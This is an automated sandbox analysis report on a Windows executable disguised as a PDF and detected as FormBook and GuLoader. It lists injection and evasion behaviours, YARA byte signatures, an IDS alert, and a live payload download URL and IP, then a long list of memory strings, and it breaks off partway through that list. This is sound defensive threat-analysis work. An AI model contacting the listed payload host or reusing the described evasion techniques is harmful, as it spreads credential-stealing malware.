Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe

Overview

General Information

Sample name:D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
Analysis ID:1518274
MD5:8681ab3286a883dbfaad479b99aef9d1
SHA1:c3df94522f79f288c5178083bb3085bb61f6ce01
SHA256:3c74c62451d876da8642fc1b4f1e689b7b6d03aa74dd9baa0aefde62cd3c13b5
Infos:

Detection

FormBook, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 3 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-25T15:07:40.964897+020028032702Potentially Bad Traffic192.168.11.2049754185.86.211.13780TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeReversingLabs: Detection: 28%
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49755 version: TLS 1.2
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23586816547.0000000002888000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.0000000002825000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23586816547.0000000002888000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.0000000002825000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23538857603.00000000329BA000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23534901660.0000000032809000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.000000000373D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23628480163.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23631787063.0000000003461000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.0000000003610000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23538857603.00000000329BA000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23534901660.0000000032809000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.000000000373D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23628480163.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23631787063.0000000003461000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.0000000003610000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49754 -> 185.86.211.137:80
        Source: global trafficHTTP traffic detected: GET /TUR.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /TUR.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /TUR.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /TUR.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: bestpack.ee
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632992719.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/TUR.bin
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/TUR.bin7
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/TUR.binA
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bestpack.ee/TUR.binI
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CD98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CD98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536172140.0000000002841000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23436668817.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536387458.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535801182.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632387899.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535505607.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536172140.0000000002841000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23436668817.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536387458.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535801182.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632387899.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535505607.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CD98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CD98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CD98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CD98000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000005.00000002.28289278020.000000000944D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25107637245.000000000944D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0?A2
        Source: explorer.exe, 00000005.00000000.25109080586.000000000A2D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.28290759677.0000000009780000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.25103733309.0000000002D00000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536172140.0000000002841000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23436668817.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536387458.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535801182.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632387899.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535505607.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: explorer.exe, 00000005.00000002.28293859220.000000000C9A4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111211406.000000000C9A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
        Source: explorer.exe, 00000005.00000002.28289278020.0000000009293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25107637245.0000000009293000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
        Source: explorer.exe, 00000005.00000000.25102736177.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25103759526.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28284053552.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111211406.000000000CA80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.25843217230.000000000CA90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000005.00000002.28294714701.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25111211406.000000000CA80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.25843217230.000000000CA90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.coh
        Source: explorer.exe, 00000005.00000002.28289278020.000000000930B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25107637245.000000000930B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25110748923.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28293859220.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=0205a87c-40a4-f50a-bd29-fb657b2a594f&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9d-3aff-8309-7d07d4031798&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=11ebfe0a-8a02-10e8-c862-80adb116274c&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=2468e4af-2f20-1a22-40fc-e932fe5418aa&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=50939367-7e05-543f-3a79-7d4c998285e9&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=736bacc7-45bd-44bc-b09d-d31eaa0229d4&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=912df6f3-e6f5-4400-ad10-cce4578ef73c&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=b7a76276-375a-718b-52d9-49eae9b263a4&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=bd48a5b1-961c-df36-94e0-ff284105d179&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=c5203baa-43e3-322d-3163-3e107126fcab&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=ccc6e965-470d-863f-66c1-91cdaa7267c8&user=m
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=efc0e9b1-9066-1580-027c-a67871a7b751&user=m
        Source: explorer.exe, 00000005.00000002.28288753497.00000000091DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000005.00000000.25110748923.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28293859220.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DA71348FD4774D4D889B34089BDD2919&timeOut=5000&oc
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25110748923.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28293859220.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000005.00000000.25107637245.0000000009395000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28289278020.0000000009395000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/CommuteLightV3.svg
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2111Image.png
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2112Image.png
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2113Image.png
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2114Image.png
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/icons/Cryptoc2117Image.png
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/currency/svg-animation/light2/g
